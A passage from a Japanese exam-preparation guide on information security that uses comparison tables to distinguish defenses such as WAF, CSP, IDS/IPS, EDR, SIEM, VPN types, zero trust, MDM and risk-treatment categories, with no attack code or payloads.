| 技術 | どこで効くか | 主な役割 | 典型キーワード | 向いている場面 |
|---|---|---|---|---|
| WAF | Web サーバーの前面 | 悪意ある HTTP リクエストを検知・遮断する | リバースプロキシ、Web アプリ前面、シグネチャ | SQL インジェクション、XSS などの攻撃を入口で止めたい |
| CSP | ユーザーのブラウザ | 読み込めるスクリプトや画像の出所を制限する | Content-Security-Policy、script-src、ヘッダ | XSS で不正スクリプトを実行される被害を抑えたい |
| SameSite | Cookie の送信条件 | クロスサイトからのリクエストで Cookie を送りにくくする | Set-Cookie、Lax、Strict | CSRF のように認証済みセッションを悪用されにくくしたい |
WAF は サーバーの手前、CSP は ブラウザの中、SameSite は Cookie の振る舞い を制御します。リクエストを止めるのか、ブラウザでの実行を抑えるのか、Cookie を送らせないのか の違いで整理してください。
クリックジャッキングと X-Frame-Options をどう切るか
クリックジャッキングは、透明な iframe などを重ねて、利用者が見えているボタンと実際に押しているボタンをずらす 攻撃です。XSS のようにスクリプトを注入するのではなく、画面の見せ方 を悪用します。
| 観点 | クリックジャッキング | XSS |
|---|---|---|
| 何を悪用するか | 画面の重ね合わせ、iframe 埋め込み | ブラウザでのスクリプト実行 |
| 主な対策 | X-Frame-Options、frame-ancestors、重要操作前の再確認 | エスケープ、CSP |
| 合図になる語 | iframe、埋め込み、重ねる、見えないボタン | script、Cookie、入力欄、出力 |
X-Frame-Options は このページを他サイトの frame に埋め込ませない ためのレスポンスヘッダです。最近は CSP の frame-ancestors で同様の制御をすることもありますが、受験ではまず クリックジャッキング → X-Frame-Options で切れれば十分です。
その他の脅威
| 脅威 | 説明 | 対策 |
|---|---|---|
| フィッシング | メール等で偽サイトへ誘導し、パスワードやカード情報を窃取 | メール認証(DMARC、SPF、DKIM)、ユーザー教育 |
| 標的型攻撃 | 特定組織の従業員を狙ったメール送信 → 潜在的な脅威をインストール | ファイアウォール、メールフィルタリング、EDR |
| ブルートフォース攻撃 | パスワードを総当たりで試す | パスワード複雑化、ロック機能、多要素認証 |
| ゼロデイ脆弱性 | 未発見の脆弱性を悪用 | パッチ管理、IPS/WAF、ソースコード監査 |
| Heartbleed | OpenSSL の Heartbeat 実装不備を突き、メモリ内容を読み取る脆弱性 | ライブラリ更新、証明書・鍵の再発行、影響範囲確認 |
| ソーシャルエンジニアリング | 人的な隙をついて情報を窃取 | ユーザー教育、内部統制、監査ログ |
| サプライチェーン攻撃 | 納入業者を経由して攻撃 | ベンダー管理、最小権限の原則、監視 |
セキュリティ対策技術
ネットワークセキュリティ対策
ネットワークセキュリティ対策は、「どこに何を置くか」で理解することが重要です。 組織の外側から内側に向かって、複数の防御層を配置する「層防御(Defense in Depth)」が標準です。
| 技術 | 位置づけ | 役割 | 検知/防止 | 対象 | 実装例 |
|---|---|---|---|---|---|
| ファイアウォール | ネットワーク最外側 | ネットワークパケットの出入りを制御 | 防止 | 組織全体のネットワーク | ISP の境界、データセンター入口 |
| IDS (Intrusion Detection System) | ネットワーク内(監視) | 不正なトラフィックパターンを検知するだけ(ブロックなし) | 検知 | ネットワーク全体 | 管理者への通知、ログ記録 |
| IPS (Intrusion Prevention System) | ネットワーク内(能動的) | 不正なトラフィックを検知して自動的にブロック | 防止 | ネットワーク全体 | 疑わしいセッションを即座に遮断 |
| WAF (Web Application Firewall) | Web サーバー前面 | HTTP/HTTPS レベルの攻撃(SQL インジェクション、XSS など)を検知・ブロック | 防止 | Web アプリケーション | CDN レイヤー、ロードバランサー |
| DMZ (Demilitarized Zone) | ネットワーク構成 | インターネット公開サーバ(Web、メールなど)を内部ネットワークから分離 | 防止 | 公開サーバ | Web サーバの隔離ネットワーク |
| VPN (Virtual Private Network) | 通信経路 | インターネット上に暗号化されたトンネルを構築し、安全な通信を実現 | 防止 | リモートアクセス、支社間通信 | リモートワーク、国際拠点間 |
| UTM (Unified Threat Management) | ネットワーク境界 | ファイアウォール、IPS、メールフィルタ、Web フィルタなどを 1 つの機器で統合 | 防止 | ネットワーク全体 | 中堅企業の入口機器 |
| サンドボックス | ホスト / クラウド | 隔離された仮想環境で、疑わしいファイルやプログラムを安全に実行・検査 | 検知 | マルウェア検出 | メール添付ファイル検査 |
| EDR (Endpoint Detection and Response) | クライアント / サーバ | PC やサーバ上の疑わしい活動をリアルタイム監視し、異常を検知・対応 | 検知・対応 | 端末(PC、サーバ) | エージェント型セキュリティソフト |
| SIEM (Security Information and Event Management) | 集約・監視 | ネットワーク全体のログを一元収集し、相関分析で脅威パターンを検知 | 検知 | 全体監視・分析 | セキュリティ監視センター(SOC) |
各層の防御の位置づけ
インターネット
↓
[ファイアウォール] ← 第 1 の防御線
↓
[IDS / IPS] ← 第 2 の防御線(ネットワークレベル)
↓
[DMZ] ← 公開サーバはここに配置
↓
[WAF] ← 第 3 の防御線(Web レベル)
↓
[Web サーバ、データベース]
↓
[EDR] ← 第 4 の防御線(エンドポイント)
↓
[SIEM] ← 全体監視(すべてのログを集約)IDS と IPS の違い
これは試験頻出です:
- IDS:警報機。火災を検知して「火事です!」と通知するだけ
- IPS:消火装置。火災を検知して、自動的に消火器を噴く
IDS は過検知が多いこともあり、分析技術者の判断に頼りますが、IPS は設定がシビアです(誤検知で正常な通信もブロックする可能性)。
IDS / IPS / EDR / SIEM を 1 枚で切る
過去問では、全部セキュリティ監視製品 に見える選択肢が並びます。ここは 何を見ているか と その場で止めるか で切ると安定します。
| 技術 | 主戦場 | 何をするか | 自動遮断 | 合図になる語 |
|---|---|---|---|---|
| IDS | ネットワーク | 不審な通信を検知して通知する | 基本はしない | 検知、通知、アラート |
| IPS | ネットワーク | 不審な通信を検知し、その場で遮断する | する | ブロック、遮断、インライン |
| EDR | 端末 | 端末内の挙動を監視し、感染後の不審動作を検知・隔離する | 対応する | エージェント、隔離、端末、感染後 |
| SIEM | 組織全体 | 複数機器のログを集約し、相関分析で異常を見つける | 基本はしない | ログ集約、相関分析、SOC |
IDS / IPS は 通信 を見る技術、EDR は 端末上の挙動 を見る技術、SIEM は 全体ログをまとめて見る 技術です。EDR があるから SIEM は不要 ではなく、EDR のログを SIEM に集約して全体像を把握する使い方もあります。
EPP / EDR / DLP を役割で分ける
端末対策の設問では、侵入を防ぐ、侵入後に見つけて動く、情報を外へ出さない が混ざりやすいです。
| 技術 | 中心目的 | 典型機能 | 合図になる語 |
|---|---|---|---|
| EPP | 侵入を防ぐ | アンチウイルス、シグネチャ検知、実行前ブロック | ウイルス対策ソフト、予防、侵入防止 |
| EDR | 侵入後を見つけて対応する | 挙動監視、隔離、調査、復旧支援 | 異常挙動、隔離、追跡、感染後 |
| DLP | 情報の持出しを防ぐ | メール添付検査、USB 制御、機密データ検知 | 持出し防止、情報漏えい、USB、送信制御 |
EPP は 予防、EDR は 検出と初動対応、DLP は 情報が外へ出る経路の制御 です。ランサムウェアに感染した後の不審通信を止める なら EDR、個人情報ファイルのメール送信を止める なら DLP を疑ってください。
VPN の種類
VPN は、公開回線(インターネット)上で暗号化された仮想的なプライベートネットワークを構築します。
| VPN 種類 | 何をつなぐか | 典型用途 | 特徴 |
|---|---|---|---|
| IPsec VPN | 拠点やルータ同士 | 本社-支社接続、拠点間通信 | ネットワーク層で暗号化し、機器同士で常時接続しやすい |
| SSL VPN | 個人端末と社内システム | 在宅勤務、外出先からの接続 | SSL/TLS を使い、ブラウザや専用クライアントで使いやすい |
| IP-VPN | 拠点間の閉域網 | 企業ネットワークの広域接続 | 通信事業者が閉域網として提供し、インターネット直結より管理しやすい |
VPN 種別を利用場面で切る
VPN という語だけ見て 1 つの技術だと思うと、支社間接続 と 在宅勤務 を同じ説明で処理してしまいます。まずは 誰と誰をつなぐか を見てください。
| 問題文の言い方 | まず疑う技術 | 理由 |
|---|---|---|
| 本社と支社のネットワークを常時つなぐ | IPsec VPN または IP-VPN | 拠点間接続の話だから |
| 社員が自宅や外出先から社内へ入る | SSL VPN | 個人端末のリモートアクセスだから |
| 通信事業者の閉域網で結ぶ | IP-VPN | キャリア提供サービスの話だから |
| ブラウザ中心で安全に社内システムへ入る | SSL VPN | 利用者側の利便性が重視されているから |
IPsec VPN と IP-VPN はどちらも拠点間で使われますが、前者は 暗号化トンネル技術、後者は 通信事業者の閉域網サービス です。
VPN 方式と仮想デスクトップ方式を分けて考える
テレワークの設問では、VPN と 仮想デスクトップ を同じ箱に入れる誤答が頻出です。ここは 通信路の保護 と 作業環境の置き場所 を分けます。
| 方式 | 本質 | 端末側で何が動くか | データの残り方 |
|---|---|---|---|
| VPN 方式 | 社内ネットワークへ安全に入る | 手元端末から社内サーバや業務システムへ直接アクセスする | 設定次第では端末側にも残りうる |
| 仮想デスクトップ方式 | 社内やクラウド上のデスクトップを遠隔操作する | 画面転送で作業し、実体は遠隔側で動く | 端末側に残しにくい |
VPN は 安全な通路、仮想デスクトップ は どこで仕事の画面や処理を動かすか の話です。VPN を使う仮想デスクトップ もあり得るので、互いに排他的な分類として覚えないでください。
テレワーク方式を 1 枚で切る
総務省のテレワークセキュリティガイドラインでも、テレワーク方式は複数に分けて整理されています。試験では名前が似た方式を取り違えやすいので、端末に何を残すか と どこで業務アプリが動くか で切るのが安全です。
| 方式 | 何が本質か | 端末側にアプリやデータが残るか | 向いている場面 |
|---|---|---|---|
| VPN 方式 | 社内ネットワークへ安全に入る | 残りうる | オフィス内と近い業務をそのまま使いたい |
| リモートデスクトップ方式 | オフィス内 PC の画面を遠隔操作する | 残しにくい | オフィス設置端末をそのまま使いたい |
| 仮想デスクトップ(VDI)方式 | 仮想デスクトップ基盤上の環境を遠隔操作する | 残しにくい | 遠隔環境を集中的に管理したい |
| セキュアコンテナ方式 | 端末内に業務専用の隔離領域を作る | コンテナ内に限定して残る | BYOD で業務領域だけ分けたい |
| セキュアブラウザ方式 | 特殊ブラウザ経由で業務システムへ入る | 制御しやすいが製品仕様次第 | Web アプリ中心の業務 |
| クラウドサービス方式 | オフィス網に入らずクラウドへ直接接続する | クラウド側中心 | SaaS 中心で完結する業務 |
迷ったら、安全な通路 の話なら VPN、オフィス PC を触る ならリモートデスクトップ、VDI 基盤を触る なら仮想デスクトップ、端末内に業務専用の箱を作る ならセキュアコンテナ、特殊ブラウザ ならセキュアブラウザ、最初からクラウドへ直接入る ならクラウドサービス方式です。
モバイル端末管理と BYOD
テレワークやスマートフォン活用が進むと、誰の端末を業務に使うか と どう統制するか を分けて考える必要があります。試験では、BYOD / COPE は運用方針、MCM / MDM は管理技術 という切り分けができるかが問われます。
| 用語 | 意味 | 長所 | 注意点 |
|---|---|---|---|
| BYOD | 従業員個人の端末を業務利用する | 導入コストを抑えやすい | 私物と業務データが混在しやすい |
| COPE | 会社所有端末を私的利用込みで貸与する | 会社側で端末統制しやすい | 端末費用は会社負担 |
| MCM | 文書・コンテンツを管理する仕組み | ファイルの暗号化や持出し制御に向く | 端末全体の設定管理までは行わない |
| MDM | 端末そのものを管理する仕組み | 遠隔ロック、設定配布、アプリ制御が可能 | 個人利用との摩擦が生じやすい |
判断のコツは、所有者 を問うなら BYOD / COPE、何を管理するか を問うなら MCM / MDM です。たとえば「個人スマホの業務ファイルだけを統制したい」なら BYOD + MCM が自然な組み合わせになります。
BYOD / COPE / MDM / MCM を組み合わせで切る
端末管理の設問では、誰の端末か と 何を制御したいか を分けると正答しやすくなります。
| 状況 | まず決める観点 | 自然な答え | 理由 |
|---|---|---|---|
| 従業員の私物スマホを業務利用したい | 端末の所有者 | BYOD | 個人所有端末の業務利用だから |
| 会社支給スマホを私用も含めて使わせたい | 端末の所有者 | COPE | 会社所有端末を貸与する考え方だから |
| 端末紛失時に遠隔ロックやワイプをしたい | 管理対象 | MDM | 端末全体の設定や制御を行うから |
| 業務文書だけ暗号化し、私物領域とは分けたい | 管理対象 | MCM | コンテンツ単位の保護が中心だから |
| 私物スマホで業務ファイルだけ厳格に統制したい | 所有者 + 管理対象 | BYOD + MCM | 私物利用を認めつつ、業務データだけ守るから |
| 会社支給端末を一括配布し、設定も強制したい | 所有者 + 管理対象 | COPE + MDM | 会社端末を端末単位で統制するから |
リモートワイプ、パスコード強制、アプリ配布 が出れば MDM、文書の持出し制御、閲覧範囲制御 が出れば MCM を疑います。BYOD と COPE は管理技術ではなく、端末所有と利用方針の話です。
ゼロトラスト
ゼロトラストとは、「社内ネットワークだから安全」という前提を捨て、「すべてを不信頼と仮定し、毎回検証する」というセキュリティ考え方です。
なぜゼロトラストが必要になったのか
従来の「境界型防御」は以下を想定していました:
- 会社の内側は信頼できる従業員だけ
- ファイアウォールで外部を遮断したら、内側は安全
しかし、現代では以下の理由でこの前提が崩壊しました:
- テレワーク拡大 → 従業員が自宅や外出先から接続。「社内」という概念が曖昧化
- クラウド利用 → データや業務システムが社内データセンター外に分散
- 内部脅威 → 不満を持つ従業員による情報盗取、マルウェア感染した社員 PC
- サプライチェーン攻撃 → 取引先の PC 経由で侵入される可能性
従来型(境界型防御)vs ゼロトラスト
| 観点 | 従来型(境界型防御) | ゼロトラスト |
|---|---|---|
| 基本方針 | 「社内 = 安全、社外 = 危険」と仮定 | 「何も信頼しない(Never Trust, Always Verify)」と仮定 |
| 初回認証後 | 認証済みなら、その後は検証しない | 毎回ユーザーとデバイスを検証 |
| ネットワーク分割 | 単純(内部ネットワーク / 外部) | 細かくセグメント化(ユーザー単位、部門単位など) |
| アクセス権限 | 「このユーザーは営業部だから」で広く付与 | 「このユーザーが 今 この 特定データ にアクセスすることが必要か」で毎回判定 |
| 適用対象 | ネットワーク境界のみ | ユーザー、デバイス、アプリケーション、データ |
| 実装技術 | ファイアウォール、VPN | MFA、EDR、IAM、暗号化、SIEM |
具体例で比較
従来型防御:
社員 A が会社ネットワークにログイン
→ 認証成功
→ その後、何日も何度もアクセスしても確認なし
→ PC がマルウェア感染しても検知されない可能性ゼロトラスト:
社員 A がアクセスを試みる
→ パスワード確認
→ 指紋認証確認
→ デバイスのセキュリティ状態確認(マルウェア感染していないか)
→ 「このユーザーがこのデータにアクセスする権限があるか」確認
→ すべて成功したらアクセス許可
→ 30 分後、別のファイルにアクセス → 上記を再度確認ゼロトラストの 7 つの基本原則
| 原則 | 説明 | 実装例 |
|---|---|---|
| 1. 検証を前提にする | すべてのユーザー、デバイス、通信を検証(何度も) | 初回ログイン、リソース毎のアクセス時に認証・認可を実施 |
| 2. 最小権限の原則 | 必要最小限のアクセス権限のみ付与 | 営業 A さんは営業部のデータにのみアクセス可能(全社データは不可) |
| 3. マイクロセグメンテーション | ネットワークを細かく分割し、セグメント間の通信を厳格に管理 | データベースサーバへのアクセスは特定の業務用 PC からのみ許可 |
| 4. 継続的な監視 | すべてのアクセスログ、通信ログを監視し、異常を検知 | 「通常と異なるアクセスパターン」を SIEM で自動検知 |
| 5. 多要素認証 | MFA を必須にし、パスワード単独では認証しない | パスワード + 指紋 + セキュリティキー など |
| 6. デバイスセキュリティ | PC やスマートフォンのセキュリティ状態を確認してからアクセス許可 | EDR でマルウェア感染を検知、感染時はアクセス遮断 |
| 7. データ保護 | 暗号化、アクセス制御で重要データを保護 | 機密ファイルは AES-256 で暗号化、アクセス権限は IAM で管理 |
ゼロトラストと従来型防御の使い分け
- 従来型防御:中小企業や従業員が少ない組織、クラウド利用が少ない場合
- ゼロトラスト:大企業、テレワーク多用、クラウド多用、金融機関など
ゼロトラストと VPN / SSO / MFA の関係
ゼロトラストは製品名ではなく、どう守るか の考え方です。そのため、VPN や SSO と同列の単一技術として覚えると崩れます。
| 用語 | 位置づけ | 何をするか | ゼロトラストとの関係 |
|---|---|---|---|
| ゼロトラスト | セキュリティの考え方 | 毎回検証し、最小権限で扱う | 中心となる方針そのもの |
| VPN | 通信路を保護する技術 | 公開回線上に安全なトンネルを作る | 使ってもよいが、それだけでは不十分 |
| SSO | 認証体験をまとめる仕組み | 一度の認証で複数システムへ入る | 利便性向上に有効だが、単独ではゼロトラストにならない |
| MFA | 認証強化の方法 | 異なる要素を組み合わせる | ゼロトラスト実装の重要要素 |
| EDR / IAM / SIEM | 運用・監視技術 | 端末監視、権限制御、ログ分析 | ゼロトラストを支える実装技術 |
VPN を導入したからゼロトラスト ではなく、VPN に加えてユーザー・端末・権限を継続検証する 方向ならゼロトラストです。SSO で再ログインが減る ことと 毎回のアクセスを細かく判定する ことも別の話として切り分けてください。
ISMS とセキュリティ関連規格
| 規格 / 基準 | 概要 | 対象 |
|---|---|---|
| ISO/IEC 27001 | 情報セキュリティマネジメントシステム(ISMS)の要件 | 組織全体 |
| ISO/IEC 27002 | ISO 27001 の管理策(コントロール)の詳細ガイドライン | 対策設計 |
| 個人情報保護方針ガイドライン | 個人情報取扱事業者向けのガイドライン | 個人情報 |
| FISC(金融情報システムセンター)安全対策基準 | 金融機関向けのセキュリティ基準 | 金融機関 |
| NIST Cybersecurity Framework | サイバーセキュリティフレームワーク(米国) | リスク管理 |
JIS Q 27000 系でのリスクマネジメントの流れ
JIS Q 27000 系では、セキュリティ対策を「思いついた順に実装する」のではなく、リスクを特定し、分析し、評価し、対応し、見直す という順で進めます。試験では、この順序を逆にした選択肢が典型的な誤りです。
| 段階 | 何をするか | 誤りやすい点 |
|---|---|---|
| リスク特定 | 情報資産、脅威、脆弱性を洗い出す | 脅威だけ見て、守る資産を整理しない |
| リスク分析 | 発生可能性と影響度を把握する | 感覚だけで大小を決める |
| リスク評価 | 優先順位を決める | 分析と評価を同じものだと思う |
| リスク対応 | 回避・低減・移転・受容を選ぶ | すべて低減しようとしてしまう |
| 監視・見直し | 対策後も継続的に点検する | 一度決めたら終わりと考える |
対応策の4類型も頻出です。
回避:その業務や仕組み自体をやめる低減:MFA、WAF、教育などで確率や影響を下げる移転:保険、外部委託、契約で責任を分ける受容:コストに見合わない場合は受け入れて監視する
受験では、対策の前に評価がある、評価の前に特定と分析がある という流れを言えるようにしてください。
リスク対応 4 類型を 1 枚で切る
過去問では、保険加入、システム廃止、教育強化、対策しない を並べて、回避 / 低減 / 移転 / 受容 を取り違えさせます。ここは リスクを減らすのか、やめるのか、他者に経済的負担を移すのか、受け入れるのか で切ってください。
| 類型 | 何をするか | 典型例 | 見分けるコツ |
|---|---|---|---|
| 回避 | リスク源そのものをなくす | 危険な業務をやめる、高リスク機能を廃止する | やらない、止める が合図 |
| 低減 | 発生確率や影響を下げる | MFA、WAF、教育、バックアップ | 減らす、抑える が合図 |
| 移転 | 損失や責任の一部を他者へ移す | 保険加入、外部委託、契約分担 | 保険、委託、補償 が合図 |
| 受容 | 対策せず意識的に受け入れる | 軽微なリスクを監視だけして受け入れる | 許容範囲、受け入れる が合図 |
保険加入は基本的に 移転 と覚える のが安全です。保険に入っても事故自体が消えるわけではないので、残余リスクは残ります。何もしない放置 と 受容 は同じではなく、分析したうえで受け入れる のが受容です。
リスク分析アプローチの 4 類型
過去問では、ベースライン、非形式的、詳細リスク分析、組み合わせ の違いを問う問題が出ています。ここでは名前ではなく、どれだけ厳密に分析するか で整理します。
| アプローチ | 考え方 | 向いている場面 | 注意点 |
|---|---|---|---|
| ベースラインアプローチ | 業界標準や社内基準を基準線として、必要な管理策を当てる | まず最低限の水準をそろえたいとき | 個別事情の深掘りは弱い |
| 非形式的アプローチ | 経験や専門家判断でリスクを見積もる | 小規模組織、迅速な判断 | 属人化しやすい |
| 詳細リスク分析 | 資産・脅威・脆弱性・発生可能性・影響を丁寧に分析する | 重要資産、金融・インフラ系 | 時間とコストがかかる |
| 組み合わせアプローチ | ベースラインと詳細分析を対象に応じて併用する | 実務で最も現実的 | どこを詳細化するかの設計が必要 |
試験では、ベースライン = 基準と照合、詳細 = 資産ごとに深く分析、組み合わせ = 両方を併用 と切れるようにしておくと十分です。
典型的なつまずき
暗号化とハッシュを混同する
「どちらも元のデータを隠すのでは?」という誤解が生じやすいです。
| 特徴 | 暗号化 | ハッシュ関数 |
|---|---|---|
| 復号化できるか | できる(秘密鍵で復号化可能) | できない(一方向) |
| 用途 | データを秘密にしたい | データが改ざんされていないか確認 |
| 例 | パスワード送信時、メールの内容を隠す | パスワード保存、ファイル完全性確認 |
| 長さ | 入力と同じ長さ(または長め) | 常に固定長(SHA-256 なら常に 256 ビット) |
試験で聞かれたら
- 「データベースに保存されているのが
abc123かSHA-256(abc123)のどちらか」と聞かれたら「ハッシュ値」 - 「通信データを秘密にしたい」なら「暗号化」
デジタル署名の鍵の役割を逆に覚える
暗号化と署名で秘密鍵と公開鍵の使用順序が逆という点は必ず混同されます。
試験対策:「送信者が秘密鍵を使うのが署名、受信者が秘密鍵を使うのが暗号化」と覚えてください。
| 処理 | 暗号化 | デジタル署名 |
|---|---|---|
| ステップ 1 | 受信者の公開鍵で暗号化 | ハッシュ値を計算 |
| ステップ 2 | - | 送信者の秘密鍵で暗号化(署名) |
| ステップ 3 | 受信者の秘密鍵で復号化 | 受信者が送信者の公開鍵で復号化 |
| 誰が秘密鍵を使うか | 受信者 | 送信者 |
「暗号化は受信者を守り、署名は送信者を証明する」という考え方が理解の鍵です。
認証と認可を混同する
試験ではこの 2 つを別々に問われることが多いです。
| 観点 | 認証 (Authentication) | 認可 (Authorization) |
|---|---|---|
| 意味 | 「あなたが本当にその人ですか?」 | 「その人は何ができますか?」 |
| 実装例 | ログイン画面でパスワード入力 → 本人確認 | ログイン後、閲覧可能なページが限定される |
| 失敗時 | ログイン失敗 | ログイン成功だがアクセス拒否 |
| 例 | 「Aさんであることを証明する」 | 「Aさん(営業部)は営業部のデータのみ閲覧可能」 |
試験で聞かれたら
- 「パスワード + MFA」なら認証
- 「このユーザーは何ができるか」なら認可
Web 攻撃(SQL インジェクション・XSS・CSRF)の攻撃対象を見落とす
この 3 つは一見似ていますが、「何を狙うのか」が全く異なります。
| 攻撃 | 攻撃対象 | 悪用するもの | 防御策が異なる理由 |
|---|---|---|---|
| SQL インジェクション | サーバー側のデータベース | 入力フォームの脆弱性 | DB のレイヤーで防ぐ必要 |
| XSS | 他のユーザーのブラウザ | 入力フォームの脆弱性 | ブラウザの実行環境で防ぐ必要 |
| CSRF | 認証済みユーザーのセッション | Cookie の自動送信 | リクエストの正当性を検証 |
試験で聞かれたら
- 「全ユーザー情報が表示された」→ SQL インジェクション
- 「別のユーザーのデータが盗まれた」→ XSS
- 「気付かずに送金された」→ CSRF
IDS と IPS の役割を混同する
「どちらも不正アクセスを対象にしているのでは?」という誤解が生じやすいです。
| 特徴 | IDS | IPS |
|---|---|---|
| 役割 | 検知のみ(警報) | 検知 + ブロック(自動防御) |
| リアルタイム対応 | なし(管理者に通知) | あり(即座に遮断) |
| 誤検知の影響 | 通知が増えるだけ | 正常通信もブロックされる可能性 |
| 導入難度 | 低い | 高い(設定が難しい) |
実生活の例
- IDS = 監視カメラ(不正な人を見つけて記録)
- IPS = 警備員(不正な人を見つけて即座に追い出す)
ファイアウォールは万能ではない
「ファイアウォールがあれば安全」は誤りです。
ファイアウォールが防げるもの:
- 正当性のないネットワークからの接続
- ブロック対象ポートへのアクセス
ファイアウォールが防げないもの:
- 内部脅威(従業員による盗取、USB メモリの持ち出し)
- 社内ネットワーク経由の攻撃(感染した社員 PC からの拡散)
- アプリケーションレベルの攻撃(SQL インジェクションは HTTP ポート 80 を使用、ファイアウォールは通す)
- ゼロデイ脆弱性(未発見の脆弱性を使った攻撃)
だからこそ、IDS/IPS、WAF、EDR など複数層の防御が必要です。
多要素認証と多段階認証の違い
「複数の認証」と言っても、質が違います。
| 方式 | 特徴 | 例 | 強度 |
|---|---|---|---|
| 多段階認証 | 同じ要素を複数回 | パスワード → セキュリティの質問 → メール認証(すべて知識) | 低い |
| 多要素認証(MFA) | 異なる要素を組み合わせ | パスワード(知識) + SMS コード(所持) | 高い |
試験では「パスワード + 秘密の質問は多要素認証か」と聞かれたら「いいえ」と答えてください(どちらも知識要素)。
正解例
- 知識 + 所持 = MFA
- 知識 + 生体 = MFA
- 所持 + 生体 = MFA
- 知識 + 知識 = MFA ではない(多段階認証)
OAuth 2.0 を『ログイン方式そのもの』と短絡する
Google でログイン という表現だけで OAuth 2.0 を選ぶのは危険です。
| 問われていること | 代表技術 |
|---|---|
| 本人確認した結果を使ってログインさせたい | OpenID Connect、SAML |
| 他サービスの API を限定的に使わせたい | OAuth 2.0 |
| 社員情報を管理したい | LDAP |
OAuth 2.0 は 何ができるかを委ねる 仕組みで、本人確認そのものとは別です。問題文に アクセス権限、トークン、外部アプリ連携 があれば OAuth 2.0、ログイン、認証済みユーザー、ID トークン があれば OpenID Connect を疑ってください。
パスキーと OTP と SSO を同じ『ログイン技術』として覚える
同じログイン画面の話に見えても、役割は別です。
| 用語 | 中心機能 |
|---|---|
| パスキー | パスワードの代わりに本人確認する |
| OTP | 認証を追加で強める |
| SSO | 一度の認証結果を使い回す |
SMSで6桁コードが届く なら OTP、一度の認証で複数システムに入れる なら SSO、端末に保存された認証情報でパスワードなしに入る ならパスキーです。
問題を解くときの観点
試験では、セキュリティの問題が多角的に出題されます。「どの視点から考えるか」を決めることで、正答率が上がります。
視点 1:「何を守るのか」で分類
| 問われたもの | 考える観点 | 例 |
|---|---|---|
| 機密性 | データを隠す | 「通信を盗聴されない」= 暗号化 |
| 完全性 | データが改ざんされていない | 「ファイルが改ざんされていないか確認」= ハッシュ関数 |
| 可用性 | システムが使える | 「攻撃でシステムが止まらない」= IDS/IPS、ファイアウォール |
| 真正性 | 相手が本物か確認 | 「本当にその人か」= 認証、デジタル署名 |
| 否認防止 | 送信者が否定できない | 「送ったメールについて後で否定されない」= デジタル署名 |
問題で「守るべき対象」が明示されていたら、上記の表で該当要素を見つけてください。
視点 2:「どの技術で守るのか」で分類
| 技術 | 用途 | 見分けポイント |
|---|---|---|
| 暗号化 | データを秘密にする | 「復号化できる」「鍵が必要」 |
| ハッシュ関数 | 改ざん検知 | 「復号化できない」「一方向」「固定長」 |
| デジタル署名 | 出所証明と否認防止 | 「秘密鍵で署名」「公開鍵で検証」 |
| 電子証明書 | 公開鍵の持ち主を証明 | 「有効期限」「認証局」「証明書」 |
| PKI | 公開鍵を信頼して使う体制 | 「認証局」「失効管理」「証明書の検証」 |
| 認証 | 本人確認 | 「ユーザーが本人か確認」 |
| FIDO / パスキー | パスワードレス認証 | 「公開鍵」「認証器」「パスワード不要」 |
| タイムスタンプ | 存在時刻と改ざん有無の証明 | 「いつ存在したか」「時刻証明」 |
| CRL / OCSP | 証明書の失効確認 | 「失効したか」「有効性確認」 |
| ファイアウォール | ネットワークフィルタ | 「パケットの出入り制御」「ポート制限」 |
| IDS/IPS | トラフィック監視 | 「攻撃パターンを検知」 |
| WAF | Web 攻撃対策 | 「SQL インジェクション、XSS 対策」 |
| X-Frame-Options | クリックジャッキング対策 | 「frame 埋め込み禁止」「iframe」 |
| CSP | ブラウザ側のスクリプト実行制御 | 「レスポンスヘッダ」「読み込み元制限」 |
| SameSite | Cookie の越境送信制御 | 「Cookie 属性」「クロスサイト」「CSRF」 |
| EPP | 端末の侵入予防 | 「ウイルス対策ソフト」「予防」 |
| EDR | 端末監視と初動対応 | 「エージェント」「隔離」「感染後」 |
| DLP | 情報持ち出し防止 | 「送信制御」「USB」「機密情報」 |
| SIEM | ログ集約と相関分析 | 「SOC」「ログ一元収集」「全体監視」 |
視点 3:「鍵の個数」が問われたら
| 与えられた条件 | 計算式 | 判断ポイント |
|---|---|---|
| 「n 人が相互通信」+ 共通鍵 | n(n-1)/2 本 | 「ペアごとに異なる鍵」が必要 |
| 「n 人が相互通信」+ 公開鍵 | 2n 個 | 「各人が公開鍵 1 + 秘密鍵 1」を持つ |
判断のコツ
- 問題文に「各ペアごとに異なる鍵」とあれば共通鍵
- 問題文に「公開鍵が必要」とあれば公開鍵
視点 3.5:「認証方式の種類」が問われたら
| 方式 | 何を手掛かりに切るか | 典型キーワード |
|---|---|---|
| 多要素認証 | 異なる要素の組み合わせか | 知識 + 所持、生体、MFA |
| ワンタイムパスワード | 毎回違う使い捨て値か | OTP、ワンタイム、認証アプリ |
| チャレンジレスポンス | 秘密を直接送らず、乱数への応答で証明するか | チャレンジ、レスポンス、乱数 |
| リスクベース認証 | 普段と違う環境だけ追加確認するか | 端末、場所、時間、追加認証 |
| シングルサインオン | 一度の認証で複数サービスへ行けるか | SSO、チケット、複数システム |
認証そのもの を聞いているのか、認証を強める方式 を聞いているのか、認証後の利便性 を聞いているのかを先に見てください。
視点 3.6:「認証基盤のどの層か」が問われたら
| 問われ方 | 中心になる技術 | 切り分けのコツ |
|---|---|---|
| ユーザー情報の台帳や属性管理 | LDAP | ID、部署、メールアドレスなどを管理する |
| ネットワーク接続時の認証要求 | RADIUS | Wi-Fi、VPN、アクセスサーバが合図 |
| チケットで再認証負荷を下げる | Kerberos | チケット、相互認証、AD 環境が合図 |
| 認証済みという結果を他サービスへ渡す | SAML / OpenID Connect | SSO、アサーション、ID トークンが合図 |
| 他サービスへの限定アクセスを許可する | OAuth 2.0 | 権限委譲、アクセストークン、API 連携が合図 |
本人確認 と 権限委譲 と 利用者情報管理 は別レイヤーです。問題文に 誰であるかを証明 と 何をしてよいかを許可 のどちらが書かれているかを先に読むと、OAuth と OpenID Connect を取り違えにくくなります。
視点 3.7:「リスク対応 4 類型」が問われたら
| 選択肢の言い方 | 中心になる類型 | 切り分けのコツ |
|---|---|---|
| その業務や機能をやめる | 回避 | リスク源を消している |
| 教育や対策で確率を下げる | 低減 | 発生確率や影響を下げている |
| 保険や契約で損失負担を分ける | 移転 | 経済的な負担や責任を他者へ移す |
| 分析して許容範囲なので受け入れる | 受容 | 対策しないことを意識的に選ぶ |
保険 が出たら基本は 移転、低リスクなので受け入れる は 受容 と覚えてください。何もしない放置 と 受容 は同じではありません。
視点 4:「脅威と対策」の対応関係
| 脅威 | 攻撃対象 | 対策技術 | 見分けポイント |
|---|---|---|---|
| SQL インジェクション | DB | プリペアドステートメント | 「データベースの不正操作」 |
